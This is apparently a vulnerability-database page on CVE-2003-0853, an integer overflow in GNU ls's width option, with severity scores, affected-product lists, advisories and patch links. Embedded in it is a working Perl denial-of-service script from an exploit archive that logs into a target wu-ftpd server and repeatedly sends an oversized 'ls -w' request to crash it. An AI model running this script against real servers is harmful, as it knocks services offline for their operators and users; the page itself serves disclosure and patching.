CVE-2003-0853
CVSS5.0
发布时间 :2003-11-17 00:00:00
修订时间 :2008-09-10 15:20:44
NMCOES    

[原文]An integer overflow in ls in the fileutils or coreutils packages may allow local users to cause a denial of service or execute arbitrary code via a large -w value, which could be remotely exploited via applications that use ls, such as wu-ftpd.


[CNNVD]Coreutils ls程序宽度参数整数溢出漏洞(CNNVD-200311-035)

        
        Coreutils 'ls'是一款用户显示文件和目录信息的工具。
        Coreutils 'ls'在处理宽度和列显示命令行参数时缺少正确的边界检查,本地或者远程攻击者可以利用这个漏洞进行整数溢出攻击,可导致应用程序崩溃。
        提交超长的参数"-w X -C"(X为任意超大值)给Coreutils 'ls'程序,会分配一块很大的内存,出现整数溢出问题,远程应用程序允许用户调用这个'ls'并没有提供参数过滤,就可能导致应用程序崩溃,如Wu-ftpd FTP服务程序存在此问题。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15
cpe:/a:washington_university:wu-ftpd:2.4.2_vr16
cpe:/a:washington_university:wu-ftpd:2.4.2_vr17
cpe:/a:washington_university:wu-ftpd:2.4.2_beta2::academ
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7
cpe:/a:washington_university:wu-ftpd:2.4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13
cpe:/a:gnu:fileutils:4.0GNU Fileutils 4.0
cpe:/a:gnu:fileutils:4.1GNU Fileutils 4.1
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5
cpe:/a:washington_university:wu-ftpd:2.6.1
cpe:/a:washington_university:wu-ftpd:2.6.0
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11
cpe:/a:gnu:fileutils:4.0.36GNU Fileutils 4.0.36
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18::academ
cpe:/a:washington_university:wu-ftpd:2.5.0
cpe:/a:gnu:fileutils:4.1.6GNU Fileutils 4.1.6
cpe:/a:gnu:fileutils:4.1.7GNU Fileutils 4.1.7
cpe:/a:washington_university:wu-ftpd:2.6.2
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0853
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0853
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-035
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8875
(VENDOR_ADVISORY)  BID  8875
http://www.turbolinux.com/security/TLSA-2003-60.txt
(UNKNOWN)  TURBO  TLSA-2003-60
http://www.securityfocus.com/advisories/6014
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-026-01
http://www.redhat.com/support/errata/RHSA-2003-310.html
(UNKNOWN)  REDHAT  RHSA-2003:310
http://www.redhat.com/support/errata/RHSA-2003-309.html
(UNKNOWN)  REDHAT  RHSA-2003:309
http://www.guninski.com/binls.html
(UNKNOWN)  MISC  http://www.guninski.com/binls.html
http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
http://secunia.com/advisories/17069
(UNKNOWN)  SECUNIA  17069
http://secunia.com/advisories/10126
(UNKNOWN)  SECUNIA  10126
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012548.html
(UNKNOWN)  FULLDISC  20031022 Fun with /bin/ls, yet still ls better than windows
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771
(UNKNOWN)  CONECTIVA  CLA-2003:771
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000768
(UNKNOWN)  CONECTIVA  CLA-2003:768
http://www.mandriva.com/security/advisories?name=MDKSA-2003:106
(UNKNOWN)  MANDRAKE  MDKSA-2003:106

- 漏洞信息

Coreutils ls程序宽度参数整数溢出漏洞
中危 边界条件错误
2003-11-17 00:00:00 2006-09-20 00:00:00
远程  
        
        Coreutils 'ls'是一款用户显示文件和目录信息的工具。
        Coreutils 'ls'在处理宽度和列显示命令行参数时缺少正确的边界检查,本地或者远程攻击者可以利用这个漏洞进行整数溢出攻击,可导致应用程序崩溃。
        提交超长的参数"-w X -C"(X为任意超大值)给Coreutils 'ls'程序,会分配一块很大的内存,出现整数溢出问题,远程应用程序允许用户调用这个'ls'并没有提供参数过滤,就可能导致应用程序崩溃,如Wu-ftpd FTP服务程序存在此问题。
        

- 公告与补丁

        厂商补丁:
        Conectiva
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fileutils-4.0-20U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fileutils-4.0-20U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/fileutils-4.1-3U80_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/fileutils-4.1-3U80_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/9/RPMS/fileutils-4.1-7779U90_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/9/SRPMS/fileutils-4.1-7779U90_1cl.src.rpm
        GNU
        ---
        CVS Tree已经修正这个漏洞:
        
        http://mail.gnu.org/archive/html/bug-coreutils/2003-10/msg00070.html

- 漏洞信息 (23274)

Coreutils 4.5.x LS Width Argument Integer Overflow Vulnerability (EDBID:23274)
linux dos
2003-10-22 Verified
0 druid
N/A [点击下载]
source: http://www.securityfocus.com/bid/8875/info

Coreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results.

Additionally it has been reported that this vulnerability may be exploited in software that implements and invokes the vulnerable 'ls' utility to trigger a denial of service in the affected software. 

#!/usr/bin/perl

# DoS sploit for ls 
# tested against wu-ftpd 2.6.2

# coded by (c) druid 
# greets to viator

use Net::FTP;

(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\@xyu.com";
$cols=1000000;#you can increase this value for more destructive result ;)


print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not 
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!"; 
print "Logged in!\n";
$ftp->cwd("/");
while ($count)
{
$ftp->ls("-w $cols -C");
 $count--; 
}
print "Done!\n";
$ftp->quit; 


		

- 漏洞信息

4621
GNU coreutils / fileutils ls -w Argument Handling Integer Overflow
Local / Remote Input Manipulation
Loss of Availability Upgrade
PoC Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

coreutils and fileutils contain an integer overflow condition in the 'ls' command that is triggered as user-supplied input is not properly validated when passed to the '-w' command line parameter. With a specially crafted command, a remote attacker as e.g. demonstrated via wu-ftpd can cause a heap-based buffer overflow, resulting in a denial of service.

- 时间线

2003-10-22 Unknow
Unknow 2003-12-22

- 解决方案

It has been reported that this issue has been fixed. Upgrade to version 5.1.0, or higher, to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Coreutils LS Width Argument Integer Overflow Vulnerability
Boundary Condition Error 8875
Yes No
2003-10-22 12:00:00 2009-07-11 11:56:00
Vulnerability discovery credited to a source that has requested not to be credited in this database.

- 受影响的程序版本

Washington University wu-ftpd 2.6.2
+ Compaq Tru64 5.1 b PK2 (BL22)
+ Compaq Tru64 5.1 b PK1 (BL1)
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a PK5 (BL23)
+ Compaq Tru64 5.1 a PK4 (BL21)
+ Compaq Tru64 5.1 a PK3 (BL3)
+ Compaq Tru64 5.1 a PK2 (BL2)
+ Compaq Tru64 5.1 a PK1 (BL1)
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1 PK6 (BL20)
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.1 PK4 (BL18)
+ Compaq Tru64 5.1 PK3 (BL17)
+ Compaq Tru64 5.1
+ Compaq Tru64 5.0 f
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Compaq Tru64 5.0 a
+ Compaq Tru64 5.0 PK4 (BL18)
+ Compaq Tru64 5.0 PK4 (BL17)
+ Compaq Tru64 5.0
+ Compaq Tru64 4.0 g PK3 (BL17)
+ Compaq Tru64 4.0 g
+ Compaq Tru64 4.0 f PK7 (BL18)
+ Compaq Tru64 4.0 f PK6 (BL17)
+ Compaq Tru64 4.0 f
+ Compaq Tru64 4.0 e
+ Compaq Tru64 4.0 d PK9 (BL17)
+ Compaq Tru64 4.0 d
+ Compaq Tru64 4.0 b
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ Sun Linux 5.0.7
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 6.0
Washington University wu-ftpd 2.6.2
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 6.0
Washington University wu-ftpd 2.6.1
+ Caldera OpenLinux 2.3
+ Caldera OpenLinux Server 3.1
+ Cobalt Qube 1.0
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
- FreeBSD FreeBSD 5.0 alpha
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.2 noarch
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 noarch
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1 x86
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
+ SCO Open Server 5.0.3
+ SCO Open Server 5.0.2
+ SCO Open Server 5.0.1
+ SCO Open Server 5.0
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
+ Turbolinux Turbolinux 6.0.5
+ Turbolinux Turbolinux 6.0.4
+ Turbolinux Turbolinux 6.0.3
+ Turbolinux Turbolinux 6.0.2
+ Turbolinux Turbolinux 6.0.1
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Workstation 6.1
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7+
Washington University wu-ftpd 2.6 .0
+ Cobalt Qube 1.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.2
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ Turbolinux Turbolinux 4.0
+ Wirex Immunix OS 6.2
Washington University wu-ftpd 2.5 .0
+ Caldera OpenLinux 2.4
+ Caldera OpenLinux Desktop 2.3
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ SCO eServer 2.3
Washington University wu-ftpd 2.4.2 academ[BETA1-15]
+ Caldera OpenLinux Standard 1.2
Washington University wu-ftpd 2.4.2 academ[BETA-18]
+ RedHat Linux 5.2 i386
Washington University wu-ftpd 2.4.2 VR17
Washington University wu-ftpd 2.4.2 VR16
Washington University wu-ftpd 2.4.2 (beta 18) VR9
Washington University wu-ftpd 2.4.2 (beta 18) VR8
Washington University wu-ftpd 2.4.2 (beta 18) VR7
Washington University wu-ftpd 2.4.2 (beta 18) VR6
Washington University wu-ftpd 2.4.2 (beta 18) VR5
Washington University wu-ftpd 2.4.2 (beta 18) VR4
Washington University wu-ftpd 2.4.2 (beta 18) VR15
Washington University wu-ftpd 2.4.2 (beta 18) VR14
Washington University wu-ftpd 2.4.2 (beta 18) VR13
Washington University wu-ftpd 2.4.2 (beta 18) VR12
Washington University wu-ftpd 2.4.2 (beta 18) VR11
Washington University wu-ftpd 2.4.2 (beta 18) VR10
Washington University wu-ftpd 2.4.1
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 4
Sun Cobalt Qube 3
SGI ProPack 2.3
SGI ProPack 2.2.1
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1
GNU fileutils 4.1.11
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
GNU fileutils 4.1.9
+ RedHat Linux 8.0
GNU fileutils 4.1.7
GNU fileutils 4.1.6
+ Sun Linux 5.0.6
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
GNU fileutils 4.1.5
+ MandrakeSoft Multi Network Firewall 2.0
GNU fileutils 4.1.1
+ Turbolinux Turbolinux Desktop 10.0
GNU fileutils 4.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Caldera OpenLinux Workstation 3.1
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0 alpha
+ Slackware Linux 8.0
+ Slackware Linux 8.0
+ Sun Cobalt Qube 3
+ Sun Cobalt Qube 3
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ 550
+ Sun Cobalt RaQ 550
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Sun Linux 5.0
+ Sun LX50
+ Sun LX50
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
+ Trustix Secure Linux 1.1
GNU fileutils 4.0.36
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ RedHat Linux 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
GNU fileutils 4.0.33
+ Trend Micro InterScan VirusWall for Unix 6.0.5
+ Turbolinux Turbolinux 6.0.5
+ Turbolinux Turbolinux 6.0.5
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.0
GNU fileutils 4.0
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 68k
+ Debian Linux 2.2 68k
+ Immunix Immunix OS 7+
+ Red Hat Linux 6.2
+ Red Hat Linux 6.2
+ Red Hat Linux 6.2
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0
+ RedHat Linux 7.0
+ RedHat Linux 7.0
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 i386
+ Slackware Linux 7.1
+ Slackware Linux 7.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 7.0
+ Slackware Linux 7.0
GNU Coreutils 5.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
GNU Coreutils 4.5.12
GNU Coreutils 4.5.11
GNU Coreutils 4.5.10
GNU Coreutils 4.5.9
GNU Coreutils 4.5.8
GNU Coreutils 4.5.7
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
GNU Coreutils 4.5.6
GNU Coreutils 4.5.5
GNU Coreutils 4.5.4
GNU Coreutils 4.5.3
+ RedHat Linux 9.0 i386
GNU Coreutils 4.5.2
GNU Coreutils 4.5.1
Avaya Integrated Management 2.1
Avaya Integrated Management
Avaya CVLAN

- 漏洞讨论

Coreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results.

Additionally it has been reported that this vulnerability may be exploited in software that implements and invokes the vulnerable 'ls' utility to trigger a denial of service in the affected software.

- 漏洞利用

No exploit is explicitly required to carry out an attack. However, a program has been released which is designed to automate the necessary operations.

A new exploit has been made available (wu-freeze.c) by Angelo Rosiello.

- 解决方案

This issue is reported to have been fixed in coreutils fileutils CVS tree.

Sun has released fixes to address this issue in Sun Cobalt Qube 3 and Cobalt RaQ XTR products. The fixes are linked below.

Sun has released a fix to address this issue in Sun Cobalt RaQ4. The fix is linked below.

Turbolinux have released an advisory (TLSA-2003-60) to address this issue. Users who are potentially affected by this vulnerability are advised to apply relative fixes as soon as possible. Further information regarding obtaining and applying these fixes can be found in the referenced advisory.

Red Hat has released an advisory (RHSA-2003:310-10) that addresses this issue on Red Hat Enterprise edition Linux. Customers who are potentially affected by this vulnerability are advised to apply appropriate fixes as soon as possible. Customers can download these fixes from the Red Hat network; further information is available in the referenced advisory.

Conectiva has released an advisory (CLA-2003:768) and fixes to address this issue. Affected users are advised to apply these fixes as soon as possible.

Conectiva has released a follow up to advisory (CLA-2003:768). The new advisory (CLA-2003:771) concerns the anonftp package that contains a copy of
the vulnerable ls program. Affected users are advised to apply these fixes as soon as possible.

Immunix has released an advisory (IMNX-2003-7+-026-01) and fixes to address this issue. Affected users are advised to apply these fixes as soon as possible.

Red Hat has released a security advisory (RHSA-2003:309-01) containing fixes.

Mandrake has released an advisory (MDKSA-2003:106) that includes updates to address the issue. Please see the attached advisory for details on obtaining and applying fixes.

An advisory has been released for Trustix Secure Linux (TSLSA-2003-0042) that includes updates for this issue. Please see the attached advisory for details on obtaining and applying updates.

SGI has released an advisory (20031101-01-U) pertaining to their ProPack Linux distribution. The advisory has been released in response to a number of RHSA advisories, and includes a patch (Patch 10032) containing updated RPM packages relating to a number of different BIDS.

Patch 10032 can be obtained via the following link:
http://support.sgi.com/

For information regarding how to obtain individual RPM packages included in Patch 10032, please see the attached advisory.

Sun has released fixes for Sun Linux.

SCO has released fixes for OpenLinux 3.1.1 Server and Workstation.

Debian has released advisory DSA 705-1 along with fixes dealing with this issue for their wu-ftp packages. Please see the referenced advisory for more information.

Avaya has released advisory ASA-2005-213 to indicate that Avaya CVLAN and Integrated Management products are vulnerable to this issue. Customers are advised to apply patches supplied by vendors of the underlying operating systems. Please see the referenced advisory for more information.


Sun Cobalt RaQ 4

Sun Cobalt RaQ XTR

Sun Cobalt Qube 3

Washington University wu-ftpd 2.6.1

Washington University wu-ftpd 2.6.2

GNU fileutils 4.0.33

GNU fileutils 4.0.36

GNU fileutils 4.1

GNU fileutils 4.1.1

GNU fileutils 4.1.11

GNU fileutils 4.1.5

GNU fileutils 4.1.9

GNU Coreutils 4.5.3

GNU Coreutils 4.5.7

GNU Coreutils 5.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站